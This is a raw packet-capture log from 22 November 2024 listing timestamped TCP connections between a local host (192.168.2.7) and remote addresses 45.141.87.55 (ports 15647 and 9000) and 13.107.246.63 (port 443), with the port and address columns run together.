                                                                                                          Nov 22, 2024 15:49:19.641176939 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.723814011 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.723968983 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:19.735829115 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.786727905 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:19.814527035 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.814732075 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:19.885214090 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.901094913 CET4434985013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.904292107 CET4434985013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.904366970 CET49850443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.904402018 CET49850443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.904419899 CET4434985013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.904429913 CET49850443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.904434919 CET4434985013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.907141924 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.907181025 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.907257080 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.907419920 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:19.907433987 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.925290108 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.925575972 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:19.934331894 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:19.992465019 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.036618948 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.045418978 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.045474052 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.136023045 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.136185884 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.165225983 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.234488010 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.258703947 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.258749962 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.336858988 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.356805086 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.357275963 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.357316971 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.357696056 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.357703924 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.378396034 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.378446102 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.460268021 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.463224888 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.498034954 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.578516006 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.578711033 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.586352110 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.699186087 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.703190088 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.703290939 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.703859091 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.703897953 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.704195023 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.704210043 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.704709053 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.815942049 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.819406986 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.819462061 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.819459915 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.819549084 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.819614887 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.819614887 CET49851443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.819669962 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.819694996 CET4434985113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.822544098 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.822598934 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.822639942 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.822663069 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.822690010 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.822839975 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:20.822854042 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.863957882 CET90004985345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.863996029 CET90004985345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.864130974 CET498539000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.864171028 CET498539000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.906162024 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.906239033 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.942147017 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:20.974644899 CET498589000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:20.983690977 CET90004985345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.024507999 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.024583101 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.025763035 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.094279051 CET90004985845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.094517946 CET498589000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.094572067 CET498589000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.143491983 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.143676043 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.144418955 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.154875994 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.158662081 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.158849955 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.158849955 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.158849955 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.161107063 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.161138058 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.161339045 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.161508083 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.161519051 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.216022015 CET90004985845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.265222073 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.265283108 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.345977068 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.346041918 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.384830952 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.458482981 CET49852443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.458537102 CET4434985213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.466626883 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.466696024 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.467241049 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.479649067 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.480123043 CET49854443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.480151892 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.480906963 CET49854443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.480917931 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.490959883 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.491358042 CET49855443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.491416931 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.491713047 CET49855443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.491725922 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.586312056 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.586419106 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.593355894 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.668515921 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.669317007 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.698600054 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.699064970 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.699126005 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.699511051 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.699525118 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.712270975 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.790725946 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.790813923 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.794605970 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.849090099 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.910505056 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.910602093 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:21.944130898 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.947977066 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.948062897 CET49854443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.948144913 CET49854443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.948144913 CET49854443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.948187113 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.948214054 CET4434985413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.950356007 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.950447083 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.950536013 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.950680017 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.950704098 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.956578016 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.959664106 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.959742069 CET49855443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.959768057 CET49855443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.959768057 CET49855443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.959781885 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.959798098 CET4434985513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.961594105 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.961679935 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.961776018 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.961872101 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:21.961911917 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:21.991935015 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.036597967 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.077471972 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.077558994 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.111573935 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.111675978 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.144449949 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.147568941 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.147624016 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.147629976 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.147677898 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.147732019 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.147749901 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.147759914 CET49856443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.147764921 CET4434985613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.150239944 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.150345087 CET4434986213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.150428057 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.150562048 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.150590897 CET4434986213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.197137117 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.231673956 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.231755972 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.242974043 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.286637068 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.354943037 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.355026007 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.433139086 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.458795071 CET90004985845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.458962917 CET90004985845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.458985090 CET498589000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.459085941 CET498589000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.474101067 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.537317991 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.537377119 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.551768064 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.552220106 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.552282095 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.552587986 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.552815914 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.552835941 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.578835964 CET90004985845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.585232973 CET498639000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.599100113 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.634027958 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.634102106 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.656971931 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.704900026 CET90004986345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.704971075 CET498639000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.705070972 CET498639000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.753668070 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.753735065 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.753890991 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.827413082 CET90004986345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.873428106 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.873488903 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.885289907 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.885684013 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.885719061 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.886138916 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:22.886149883 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.970324039 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.970457077 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:22.993808031 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:22.993881941 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.018230915 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.018315077 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.018389940 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.018631935 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.018631935 CET49857443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.018671989 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.018696070 CET4434985713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.021200895 CET49864443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.021246910 CET4434986413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.021321058 CET49864443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.021544933 CET49864443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.021558046 CET4434986413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.076018095 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.090228081 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.113521099 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.118457079 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.200128078 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.241744041 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.255357981 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.291682005 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.319412947 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.322534084 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.322602034 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.322665930 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.323308945 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.324816942 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.324816942 CET49859443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.324842930 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.324865103 CET4434985913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.328556061 CET49865443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.328638077 CET4434986513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.328773022 CET49865443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.328908920 CET49865443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.328949928 CET4434986513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.442375898 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.443686008 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.474337101 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.496300936 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.554444075 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.594958067 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.644618034 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.686844110 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.742541075 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.791594982 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.795258045 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.806996107 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.807085991 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.853153944 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.855139017 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.896692991 CET4434986213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.942863941 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.943628073 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.954929113 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.954963923 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.955414057 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.955431938 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.955754042 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.955782890 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.956103086 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:23.956180096 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.956193924 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.956665993 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.956675053 CET4434986213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:23.957021952 CET49862443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:23.957032919 CET4434986213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.076056957 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.076112986 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.076622009 CET90004986345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.076787949 CET498639000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.076937914 CET90004986345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.076983929 CET498639000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.144747972 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.192842960 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.193403006 CET498669000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.198007107 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.198064089 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:24.198628902 CET90004986345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.277178049 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.284964085 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.286859035 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.286931992 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.289253950 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.289274931 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.289287090 CET49861443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.289293051 CET4434986113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.291207075 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.292761087 CET49867443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.292851925 CET4434986713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.292952061 CET49867443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.293096066 CET49867443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.293124914 CET4434986713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.293721914 CET4434986013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:24.293791056 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.293853045 CET49860443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:24.293853045 CET49860443192.168.2.713.107.246.63
